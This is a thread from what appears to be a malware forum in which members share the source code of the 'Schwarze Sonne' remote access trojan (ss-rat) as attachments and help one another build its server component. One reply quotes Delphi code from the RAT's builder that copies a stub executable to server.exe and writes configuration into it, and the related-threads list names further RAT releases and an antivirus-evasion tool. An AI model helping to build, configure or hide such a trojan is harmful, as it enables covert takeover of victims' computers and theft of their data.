+ Reply to Thread
Page 1 of 6 123 ... LastLast
Results 1 to 10 of 51
  1. #1
    Senior Member Pernat1y's Avatar
    Join Date
    Dec 2007
    Location
    USSR
    Posts
    2,016

    schwarze sonne rat (ss-rat) sources

    ss-rat sources from SVN
    Latest official revision - 159
    Latest revision - 161

    @pernat1y, please do not replace the new version with zyklon rat.
    merely add that attachment if you choose.
    thank you
    //cswi
    Attached Files Attached Files
    Last edited by counterstrikewi; 13-02-2011 at 17:31.
    Away for 1~3 years

  2. #2
    Senior Member
    Join Date
    Sep 2009
    Posts
    107
    awesome!!!

  3. #3
    Senior Member fuad_2000's Avatar
    Join Date
    Mar 2010
    Location
    nicotine
    Posts
    400
    is this new update

  4. #4
    Banned
    Join Date
    Apr 2010
    Location
    Germany
    Posts
    353
    Quote Originally Posted by fuad_2000 View Post
    is this new update
    lol u def cant read...its the source code of ss-rat

  5. #5
    Junior Member
    Join Date
    Jul 2009
    Posts
    10
    where is the 'stub' source code?

  6. #6
    Senior Member D@rB-15's Avatar
    Join Date
    Feb 2009
    Location
    Somewhere, somehow alive :P
    Posts
    172
    You mean the server?, is in the zip
    Linux es mi vida y Delphi es mi corazon ;P
    "Soy un joven ecologista, agarrame el tronco de este arbolito frondoso."

  7. #7
    Junior Member
    Join Date
    Nov 2010
    Posts
    2
    hmpf.jpg how can i fix this? some1 can send me all that file that needs to be in that folder?


  8. #8
    Senior Member counterstrikewi's Avatar
    Join Date
    Apr 2009
    Location
    \??\.\PhysicalDrive0:\+00h
    Posts
    1,982
    use graphics32 package from spynet source/.
    DelphiBasics - Ultimate Delphi Resource for Beginners
    www.delphibasics.info

  9. #9
    Junior Member
    Join Date
    Jul 2009
    Posts
    10
    Quote Originally Posted by D@rB-15 View Post
    You mean the server?, is in the zip
    No I talk about the client builder. I wanted to build a server and I have error message: "cant copy stub.exe to server.exe".

    I have put the server.exe in the client directory but it's not enough.

  10. #10
    Senior Member G-POINT's Avatar
    Join Date
    Jun 2009
    Posts
    199
    Quote Originally Posted by skydeath View Post
    No I talk about the client builder. I wanted to build a server and I have error message: "cant copy stub.exe to server.exe".

    I have put the server.exe in the client directory but it's not enough.
    I bet you can read.

    if checkbox2.Checked = false then sStubPath := '\stub\stub_nomanifest.exe' else sStubPath := '\stub\stub_manifest.exe';
    if FileExists(GetCurrentDir + sStubPath) = false then begin
    redt1.Text := redt1.Text + #13 + '[' + TimeToStr(Time) + '] Stub.exe not found! Canceling Process..';
    Exit;
    end;
    if FileExists(GetCurrentDir + '\server.exe') then begin
    redt1.Text := redt1.Text + #13 + '[' + TimeToStr(Time) + '] Existing Server.exe found!';
    if DeleteFile(GetCurrentDir + '\server.exe') then begin
    redt1.Text := redt1.Text + #13 + '[' + TimeToStr(Time) + '] Existing Server.exe deleted!';
    end else begin
    redt1.Text := redt1.Text + #13 + '[' + TimeToStr(Time) + '] Can''t delete existing Server.exe! Canceling Proces...';
    Exit;
    end;
    end;
    if CopyFile(PChar(GetCurrentDir + sStubPath),PChar(GetCurrentDir + '\server.exe'), false) = false then begin
    redt1.Text := redt1.Text + #13 + '[' + TimeToStr(Time) + '] Can''t copy Stub.exe to Server.exe! Canceling Process...';
    Exit;
    end else begin
    redt1.Text := redt1.Text + #13 + '[' + TimeToStr(Time) + '] Copied Stub.exe to Server.exe sucessfully!';
    end;
    if WriteSettings(PChar(GetCurrentDir + '\server.exe'),sString) = true then begin
    redt1.Text := redt1.Text + #13 + '[' + TimeToStr(Time) + '] Settings written to Server.exe sucessfully!';
    end else begin
    redt1.Text := redt1.Text + #13 + '[' + TimeToStr(Time) + '] Can''t write settings to Server.exe! Canceling Process...';
    Exit;
    end;

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Similar Threads

  1. Schwarze Sonne RAT 0.8
    By slayer616 in forum Malware Samples and Information
    Replies: 53
    Last Post: 10-04-2011, 19:59
  2. [REL] Schwarze Sonne RAT 0.9
    By slayer616 in forum Malware Samples and Information
    Replies: 88
    Last Post: 10-04-2011, 05:39
  3. Schwarze Sonne Undetecter
    By slayer616 in forum Malware Samples and Information
    Replies: 15
    Last Post: 06-11-2010, 16:27
  4. [SRC]Schwarze Sonne RAT 0.2 Beta
    By slayer616 in forum Malware sources
    Replies: 42
    Last Post: 31-08-2010, 20:10
  5. [REL] Schwarze Sonne RAT 0.8.1
    By slayer616 in forum Malware Samples and Information
    Replies: 62
    Last Post: 26-04-2010, 18:05

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts

Search Engine Friendly URLs by vBSEO 3.6.0 ©2011, Crawlability, Inc.